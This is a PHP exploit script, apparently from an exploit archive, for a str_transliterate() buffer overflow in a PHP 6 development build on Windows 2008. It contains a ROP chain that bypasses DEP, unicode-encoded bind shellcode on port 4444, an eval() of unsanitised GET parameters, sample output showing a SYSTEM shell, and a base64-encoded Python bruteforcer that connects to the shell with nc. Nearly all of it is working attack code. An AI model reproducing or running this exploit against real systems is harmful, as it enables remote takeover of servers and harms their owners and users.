<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson
Matteo Memelli aka ryujin ( AT ) offsec.com
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)
Thx to muts and Elwood for helping ;)
Bruteforce script is attached in base64 format.
root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof || ryujin # offsec.com
(*) Bruteforcing WPM ret address...
(+) Trying base address 0x78000000
(+) Trying base address 0x77000000
(+) Trying base address 0x76000000
(+) Trying base address 0x75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\bin\apache\Apache2.2.11>whoami
whoami
nt authority\system
*/
error_reporting(0);
$base_s = $_GET['pos_s'];
$base_e = $_GET['pos_e'];
$off_s = $_GET['off_s'];
$off_e = $_GET['off_e'];
if(ini_get_bool('unicode.semantics')) {
$buff = str_repeat("\u4141", 32);
$tbp = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM
$ptw = "\u2FE0\u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES
$ret = "\u2660\u6EE5"; // 6EE52660 RET AFTER WPM
$wpmargs = $ret."\uFFFF\uFFFF".$tbp."\uFFFF\uFFFF\uFFFF\uFFFF".$ptw; // WPM ARGS
$garbage = "\$wpm = \"\\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))).
"\\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."\";";
eval($garbage);
$nops = str_repeat("\u9090", 41);
// TH || ROP -> Try Harder or Rest On Pain ;)
// GETTING SHELLCODE ABSOLUTE ADDRESS
$rop = "\u40dd\u6FF2"; // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN 6FF240DD
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4
$rop .= "\uFDBC\uFFFF"; // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC
$rop .= "\u222B\u6EED"; // ADD EAX,ECX/POP EBX/POP EBP/RETN 6EED222B
$rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE)
$rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE)
// PATCHING BUFFER ADDY ARG FOR WPM
$rop .= "\u1C13\u6EE6"; // ADD DWORD PTR DS:[EAX],EAX/RETN 6EE61C13
// GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE)
$rop .= "\uE94E\u6EE6"; // MOV EDX,ECX/POP EBP/RETN 6EE6E94E
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4
$rop .= "\uFF5C\uFFFF"; // VALUE TO BE POPPED IN ECX FFFFFF5C
$rop .= "\uE94C\u6EE6"; // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN 6EE6E94C
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
// PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
$rop .= "\u0C54\u6EE7"; // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN 6EE70C54
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
// REALIGNING ESP TO WPM AND RETURNING TO IT
$rop .= "\u8640\u6EE6"; // ADD EAX,-30/POP EBP/RETN 6EE68640
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN 6EE629F1
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN 6EE629F1
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u2C63\u6FC5"; // XCHG EAX,ESP/RETN 6FC52C63
// unicode bind shellcode port 4444, 318 bytes
$sh = "\u6afc\u4deb\uf9e8\uffff\u60ff\u6c8b\u2424\u458b\u8b3c\u057c\u0178\u8bef\u184f\u5f8b".
"\u0120\u49eb\u348b\u018b\u31ee\u99c0\u84ac\u74c0\uc107\u0dca\uc201\uf4eb\u543b\u2824".
"\ue575\u5f8b\u0124\u66eb\u0c8b\u8b4b\u1c5f\ueb01\u2c03\u898b\u246c\u611c\u31c3\u64db".
"\u438b\u8b30\u0c40\u708b\uad1c\u408b\u5e08\u8e68\u0e4e\u50ec\ud6ff\u5366\u6866\u3233".
"\u7768\u3273\u545f\ud0ff\ucb68\ufced\u503b\ud6ff\u895f\u66e5\ued81\u0208\u6a55\uff02".
"\u68d0\u09d9\uadf5\uff57\u53d6\u5353\u5353\u5343\u5343\ud0ff\u6866\u5c11\u5366\ue189".
"\u6895\u1aa4\uc770\uff57\u6ad6\u5110\uff55\u68d0\uada4\ue92e\uff57\u53d6\uff55\u68d0".
"\u49e5\u4986\uff57\u50d6\u5454\uff55\u93d0\ue768\uc679\u5779\ud6ff\uff55\u66d0\u646a".
"\u6866\u6d63\ue589\u506a\u2959\u89cc\u6ae7\u8944\u31e2\uf3c0\ufeaa\u2d42\u42fe\u932c".
"\u7a8d\uab38\uabab\u7268\ub3fe\uff16\u4475\ud6ff\u575b\u5152\u5151\u016a\u5151\u5155".
"\ud0ff\uad68\u05d9\u53ce\ud6ff\uff6a\u37ff\ud0ff\u578b\u83fc\u64c4\ud6ff\uff52\u68d0".
"\uceef\u60e0\uff53\uffd6\ud0d0\u4142\u4344\u4142\u4344\u4142\u4344\u4142\u4344";
$exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop;
str_transliterate(0, $exploit, 0);
} else {
exit("Error! 'unicode.semantics' has be on!\r\n");
}
function ini_get_bool($a) {
$b = ini_get($a);
switch (strtolower($b)) {
case 'on':
case 'yes':
case 'true':
return 'assert.active' !== $a;
case 'stdout':
case 'stderr':
return 'display_errors' === $a;
default:
return (bool) (int) $b;
}
}
/*
IyEvdXNyL2Jpbi9weXRob24KaW1wb3J0IHN5cywgcmFuZG9tLCBvcywgdGltZSwgdXJsbGliCmlt
cG9ydCBzb2NrZXQgCgp0YXJnZXRzID0geyd3aW4yazgnOiBbMHgxQywgMHhDNl0sIH0KdGltZW91
dCA9IDAuMQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQodGltZW91dCkKCnRyeToKICAgaG9zdCAg
ICAgPSBzeXMuYXJndlsxXQogICBwYXRoICAgICA9IHN5cy5hcmd2WzJdCiAgIHRhcmdldCAgID0g
c3lzLmFyZ3ZbM10KZXhjZXB0IEluZGV4RXJyb3I6CiAgIHByaW50ICJVc2FnZTogJXMgaG9zdCBw
YXRoIHRhcmdldCIgJSBzeXMuYXJndlswXQogICBwcmludCAiRXhhbXBsZTogJXMgMTcyLjE2LjMw
LjI0OSAvIHdpbjJrOCIgJSBzeXMuYXJndlswXQogICBwcmludCAiU3VwcG9ydGVkIHRhcmdldHM6
IFdpbmRvd3MgMjAwOCBTUDE6IHdpbjJrOCIKICAgc3lzLmV4aXQoKQoKaWYgdGFyZ2V0IG5vdCBp
biB0YXJnZXRzOgogICBwcmludCAiVGFyZ2V0IG5vdCBzdXBwb3J0ZWQhIgogICBzeXMuZXhpdCgp
CmVsc2U6CiAgIHRhcmdldF9hX3MsIHRhcmdldF9hX2UgPSB0YXJnZXRzW3RhcmdldF1bMF0sIHRh
cmdldHNbdGFyZ2V0XVsxXQoKZGVmIHNlbmRSZXF1ZXN0KGksayk6CiAgIHBhcmFtcyA9IHVybGxp
Yi51cmxlbmNvZGUoeydwb3NfZSc6IGksICdwb3Nfcyc6IGssICdvZmZfcyc6IHRhcmdldF9hX3Ms
IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnb2ZmX2UnOiB0YXJnZXRfYV9lLCAncm5k
Jzogc3RyKGludChyYW5kb20ucmFuZG9tKCkpKSx9KQogICB0cnk6CiAgICAgIGYgPSB1cmxsaWIu
dXJsb3BlbigiaHR0cDovLyVzJXM/JXMiICUgKGhvc3QsIHBhdGgsIHBhcmFtcykpCiAgICAgIHBy
aW50IGYucmVhZCgpCiAgIGV4Y2VwdCBJT0Vycm9yOgogICAgICBwYXNzCgppZiBfX25hbWVfXyA9
PSAnX19tYWluX18nOgogICBwcmludCAiKCopIFBocDYgc3RyX3RyYW5zbGl0ZXJhdGUoKSBib2Yg
fHwgcnl1amluICMgb2Zmc2VjLmNvbSIKICAgcHJpbnQgIigqKSBCcnV0ZWZvcmNpbmcgV3JpdGVQ
cm9jZXNzTWVtb3J5IHJldCBhZGRyZXNzLi4uIgogICBiID0gcmFuZ2UoMTEyLDEyMSkKICAgYi5y
ZXZlcnNlKCkKICAgZm9yIGsgaW4gYjoKICAgICAgcHJpbnQgIigrKSBUcnlpbmcgYmFzZSBhZGRy
ZXNzIDB4JXgwMDAwMDAiICUgayAKICAgICAgZm9yIGkgaW4gcmFuZ2UoMSwyNTYpOgogICAgICAg
ICBzZW5kUmVxdWVzdChpLGspCiAgICAgICAgIGlmIG9zLnN5c3RlbSgibmMgLXZuICVzIDQ0NDQg
Mj4vZGV2L251bGwiICUgaG9zdCkgPT0gMDoKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgdGlt
ZS5zbGVlcCgwLjA1KSAK
*/
?>